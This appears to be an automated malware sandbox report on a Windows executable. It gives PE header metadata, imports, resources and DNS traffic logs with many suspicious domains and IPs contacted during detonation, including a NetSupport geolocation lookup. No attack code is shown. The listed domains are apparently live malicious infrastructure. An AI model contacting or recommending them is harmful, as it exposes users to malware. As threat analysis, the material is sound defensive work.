Preview:	L..................F.@.. ...$+.,......{.H(..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W)l....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W)l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W)l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W)l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W+l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........R..d.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Entrypoint:	0x4b5eec
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	e569e6f445d32ba23766ad67d1e3787f

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xc4000	0x9a	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2000	0xfdc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc22f4	0x254	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xc3000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb39e4	0xb3a00	False	0.34525867693110646	data	6.357635049994181	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xb5000	0x1688	0x1800	False	0.54443359375	data	5.971425428435973	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x37a4	0x3800	False	0.36097935267857145	data	5.048648594372454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xbb000	0x6de8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc2000	0xfdc	0x1000	False	0.3798828125	data	5.029087481102678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xc3000	0x1a4	0x200	False	0.345703125	data	2.7509822285969876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xc4000	0x9a	0x200	False	0.2578125	data	1.877162954504408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xc5000	0x18	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xc6000	0x5d	0x200	False	0.189453125	data	1.3838943752217987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0x11000	0x11000	False	0.18623621323529413	data	3.69581702026596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xc80e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xc8748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xc8a30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xc8b58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xca180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcb028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcb8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcbe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xcd120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd1348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd38f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd4998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd4e00	0x360	data			0.34375
RT_STRING	0xd5160	0x260	data			0.3256578947368421
RT_STRING	0xd53c0	0x45c	data			0.4068100358422939
RT_STRING	0xd581c	0x40c	data			0.3754826254826255
RT_STRING	0xd5c28	0x2d4	data			0.39226519337016574
RT_STRING	0xd5efc	0xb8	data			0.6467391304347826
RT_STRING	0xd5fb4	0x9c	data			0.6410256410256411
RT_STRING	0xd6050	0x374	data			0.4230769230769231
RT_STRING	0xd63c4	0x398	data			0.3358695652173913
RT_STRING	0xd675c	0x368	data			0.3795871559633027
RT_STRING	0xd6ac4	0x2a4	data			0.4275147928994083
RT_RCDATA	0xd6d68	0x10	data			1.5
RT_RCDATA	0xd6d78	0x2c4	data			0.6384180790960452
RT_RCDATA	0xd703c	0x2c	data			1.1363636363636365
RT_GROUP_ICON	0xd7068	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xd7124	0x584	data	English	United States	0.2754957507082153
RT_MANIFEST	0xd76a8	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4541a8
__dbk_fcall_wrapper	2	0x40d0a0
dbkFCallWrapperAddr	1	0x4be63c

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2023 14:33:00.202003956 CET	192.168.2.5	1.1.1.1	0x64f5	Standard query (0)	sparksteam.site	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:01.320431948 CET	192.168.2.5	1.1.1.1	0x4697	Standard query (0)	sidemark.xyz	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:07.133460999 CET	192.168.2.5	1.1.1.1	0xf9b6	Standard query (0)	false.apparelsilver.xyz	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:08.182564020 CET	192.168.2.5	1.1.1.1	0xed20	Standard query (0)	www.agenment.cloud	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:17.925205946 CET	192.168.2.5	1.1.1.1	0xd005	Standard query (0)	myptofgrtulo.info	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:18.073877096 CET	192.168.2.5	1.1.1.1	0x2f1	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.342009068 CET	192.168.2.5	1.1.1.1	0x8f32	Standard query (0)	axsboe-campaign.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.342268944 CET	192.168.2.5	1.1.1.1	0xddb9	Standard query (0)	axsboe-campaign.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:19.409605980 CET	192.168.2.5	1.1.1.1	0xd633	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.409925938 CET	192.168.2.5	1.1.1.1	0xfe16	Standard query (0)	clients2.google.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:19.410706997 CET	192.168.2.5	1.1.1.1	0x8112	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.410965919 CET	192.168.2.5	1.1.1.1	0x2862	Standard query (0)	accounts.google.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:19.717430115 CET	192.168.2.5	1.1.1.1	0x9ee6	Standard query (0)	send.planewool.xyz	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:21.023643017 CET	192.168.2.5	1.1.1.1	0xa195	Standard query (0)	kapetownlink.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:21.263468027 CET	192.168.2.5	1.1.1.1	0xe59d	Standard query (0)	aefd.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:21.263768911 CET	192.168.2.5	1.1.1.1	0xc620	Standard query (0)	aefd.nelreports.net	65	IN (0x0001)	false
Dec 6, 2023 14:33:23.748706102 CET	192.168.2.5	1.1.1.1	0x2cdd	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:23.748893023 CET	192.168.2.5	1.1.1.1	0xe605	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:25.257385015 CET	192.168.2.5	1.1.1.1	0x474c	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:25.257742882 CET	192.168.2.5	1.1.1.1	0x97d6	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:25.390867949 CET	192.168.2.5	1.1.1.1	0xfd3e	Standard query (0)	login.microsoftonline.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:25.391132116 CET	192.168.2.5	1.1.1.1	0xdb2a	Standard query (0)	login.microsoftonline.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:25.783134937 CET	192.168.2.5	1.1.1.1	0x2d65	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:25.783510923 CET	192.168.2.5	1.1.1.1	0x5da6	Standard query (0)	www.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:26.634099960 CET	192.168.2.5	1.1.1.1	0x25ca	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:26.634325027 CET	192.168.2.5	1.1.1.1	0xb637	Standard query (0)	www.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:31.426584959 CET	192.168.2.5	1.1.1.1	0x6c83	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:31.426903009 CET	192.168.2.5	1.1.1.1	0xe195	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:31.514034033 CET	192.168.2.5	1.1.1.1	0x1023	Standard query (0)	browser.events.data.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:31.514341116 CET	192.168.2.5	1.1.1.1	0x538e	Standard query (0)	browser.events.data.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:32.286326885 CET	192.168.2.5	1.1.1.1	0x6362	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:32.286545992 CET	192.168.2.5	1.1.1.1	0x5bdd	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:33.375530005 CET	192.168.2.5	1.1.1.1	0xe380	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:33.375886917 CET	192.168.2.5	1.1.1.1	0x9d76	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:33:37.974241972 CET	192.168.2.5	1.1.1.1	0xaa37	Standard query (0)	ecn.dev.virtualearth.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:37.974479914 CET	192.168.2.5	1.1.1.1	0x7d4	Standard query (0)	ecn.dev.virtualearth.net	65	IN (0x0001)	false
Dec 6, 2023 14:33:38.792800903 CET	192.168.2.5	1.1.1.1	0x8bb5	Standard query (0)	ecn.dev.virtualearth.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:38.793090105 CET	192.168.2.5	1.1.1.1	0xcdcf	Standard query (0)	ecn.dev.virtualearth.net	65	IN (0x0001)	false
Dec 6, 2023 14:33:41.230685949 CET	192.168.2.5	1.1.1.1	0xbc1	Standard query (0)	pstbbk.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:41.231300116 CET	192.168.2.5	1.1.1.1	0x8443	Standard query (0)	collect.installeranalytics.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:41.522186995 CET	192.168.2.5	1.1.1.1	0xac67	Standard query (0)	allroadslimit.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.000662088 CET	192.168.2.5	1.1.1.1	0x244f	Standard query (0)	231005002055611.bcn.lca62.shop	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.498950005 CET	192.168.2.5	1.1.1.1	0xd231	Standard query (0)	ambadevgroup.info	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:44.533335924 CET	192.168.2.5	1.1.1.1	0x5a7a	Standard query (0)	dl.likeasurfer.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:03.421499014 CET	192.168.2.5	1.1.1.1	0x6caa	Standard query (0)	111.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.097946882 CET	192.168.2.5	1.1.1.1	0x5072	Standard query (0)	114.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.624293089 CET	192.168.2.5	1.1.1.1	0x359d	Standard query (0)	113.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.767713070 CET	192.168.2.5	1.1.1.1	0xf59a	Standard query (0)	112.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:04.797346115 CET	192.168.2.5	1.1.1.1	0x10d8	Standard query (0)	110.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:08.534789085 CET	192.168.2.5	1.1.1.1	0x43d6	Standard query (0)	111.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.203743935 CET	192.168.2.5	1.1.1.1	0x1bc	Standard query (0)	114.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.730432034 CET	192.168.2.5	1.1.1.1	0x9721	Standard query (0)	113.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.873585939 CET	192.168.2.5	1.1.1.1	0xba0f	Standard query (0)	112.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:09.921086073 CET	192.168.2.5	1.1.1.1	0xa845	Standard query (0)	110.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.763995886 CET	192.168.2.5	1.1.1.1	0x890e	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:34:48.764190912 CET	192.168.2.5	1.1.1.1	0x32f0	Standard query (0)	clients1.google.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2023 14:33:00.460052967 CET	1.1.1.1	192.168.2.5	0x64f5	No error (0)	sparksteam.site		104.21.52.223	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:00.460052967 CET	1.1.1.1	192.168.2.5	0x64f5	No error (0)	sparksteam.site		172.67.204.180	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:01.425113916 CET	1.1.1.1	192.168.2.5	0x4697	No error (0)	sidemark.xyz		104.21.73.195	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:01.425113916 CET	1.1.1.1	192.168.2.5	0x4697	No error (0)	sidemark.xyz		172.67.165.204	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:07.234751940 CET	1.1.1.1	192.168.2.5	0xf9b6	No error (0)	false.apparelsilver.xyz		172.67.198.151	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:07.234751940 CET	1.1.1.1	192.168.2.5	0xf9b6	No error (0)	false.apparelsilver.xyz		104.21.13.66	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:08.319574118 CET	1.1.1.1	192.168.2.5	0xed20	No error (0)	www.agenment.cloud		185.23.108.224	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:18.096036911 CET	1.1.1.1	192.168.2.5	0xd005	No error (0)	myptofgrtulo.info		95.142.47.11	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:18.176599979 CET	1.1.1.1	192.168.2.5	0x2f1	No error (0)	geo.netsupportsoftware.com		51.142.119.24	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:18.176599979 CET	1.1.1.1	192.168.2.5	0x2f1	No error (0)	geo.netsupportsoftware.com		62.172.138.67	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:18.176599979 CET	1.1.1.1	192.168.2.5	0x2f1	No error (0)	geo.netsupportsoftware.com		62.172.138.8	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.499531031 CET	1.1.1.1	192.168.2.5	0xddb9	No error (0)	axsboe-campaign.com			65	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients.l.google.com		142.251.111.100	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients.l.google.com		142.251.111.138	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients.l.google.com		142.251.111.113	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients.l.google.com		142.251.111.101	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients.l.google.com		142.251.111.102	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.504555941 CET	1.1.1.1	192.168.2.5	0xd633	No error (0)	clients.l.google.com		142.251.111.139	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.505215883 CET	1.1.1.1	192.168.2.5	0xfe16	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:19.505743980 CET	1.1.1.1	192.168.2.5	0x8112	No error (0)	accounts.google.com		172.253.115.84	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.513467073 CET	1.1.1.1	192.168.2.5	0x8f32	No error (0)	axsboe-campaign.com		172.67.213.153	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.513467073 CET	1.1.1.1	192.168.2.5	0x8f32	No error (0)	axsboe-campaign.com		104.21.37.216	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.820151091 CET	1.1.1.1	192.168.2.5	0x9ee6	No error (0)	send.planewool.xyz		104.21.90.147	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:19.820151091 CET	1.1.1.1	192.168.2.5	0x9ee6	No error (0)	send.planewool.xyz		172.67.157.197	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:21.122421026 CET	1.1.1.1	192.168.2.5	0xa195	No error (0)	kapetownlink.com		159.223.29.40	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:21.358040094 CET	1.1.1.1	192.168.2.5	0xe59d	No error (0)	aefd.nelreports.net	aefd.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:21.358808041 CET	1.1.1.1	192.168.2.5	0xc620	No error (0)	aefd.nelreports.net	aefd.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:23.844010115 CET	1.1.1.1	192.168.2.5	0xe605	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 6, 2023 14:33:23.844444036 CET	1.1.1.1	192.168.2.5	0x2cdd	No error (0)	www.google.com		172.253.63.105	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:23.844444036 CET	1.1.1.1	192.168.2.5	0x2cdd	No error (0)	www.google.com		172.253.63.103	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:23.844444036 CET	1.1.1.1	192.168.2.5	0x2cdd	No error (0)	www.google.com		172.253.63.147	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:23.844444036 CET	1.1.1.1	192.168.2.5	0x2cdd	No error (0)	www.google.com		172.253.63.99	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:23.844444036 CET	1.1.1.1	192.168.2.5	0x2cdd	No error (0)	www.google.com		172.253.63.106	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:23.844444036 CET	1.1.1.1	192.168.2.5	0x2cdd	No error (0)	www.google.com		172.253.63.104	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:25.352593899 CET	1.1.1.1	192.168.2.5	0x97d6	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:25.353029013 CET	1.1.1.1	192.168.2.5	0x474c	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:25.485702991 CET	1.1.1.1	192.168.2.5	0xdb2a	No error (0)	login.microsoftonline.com	login.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:25.485771894 CET	1.1.1.1	192.168.2.5	0xfd3e	No error (0)	login.microsoftonline.com	login.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:25.878160000 CET	1.1.1.1	192.168.2.5	0x2d65	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:25.878644943 CET	1.1.1.1	192.168.2.5	0x5da6	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:26.729237080 CET	1.1.1.1	192.168.2.5	0x25ca	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:26.729521036 CET	1.1.1.1	192.168.2.5	0xb637	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:27.071861982 CET	1.1.1.1	192.168.2.5	0x7af2	No error (0)	shed.dual-low.part-0012.t-0009.t-msedge.net	part-0012.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:27.071861982 CET	1.1.1.1	192.168.2.5	0x7af2	No error (0)	part-0012.t-0009.t-msedge.net		13.107.246.40	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:27.071861982 CET	1.1.1.1	192.168.2.5	0x7af2	No error (0)	part-0012.t-0009.t-msedge.net		13.107.213.40	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:33:31.521747112 CET	1.1.1.1	192.168.2.5	0x6c83	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:31.522874117 CET	1.1.1.1	192.168.2.5	0xe195	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:31.609038115 CET	1.1.1.1	192.168.2.5	0x538e	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:31.609668970 CET	1.1.1.1	192.168.2.5	0x1023	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:32.381380081 CET	1.1.1.1	192.168.2.5	0x5bdd	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:32.381810904 CET	1.1.1.1	192.168.2.5	0x6362	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:33.470432043 CET	1.1.1.1	192.168.2.5	0xe380	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:33:33.471827030 CET	1.1.1.1	192.168.2.5	0x9d76	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
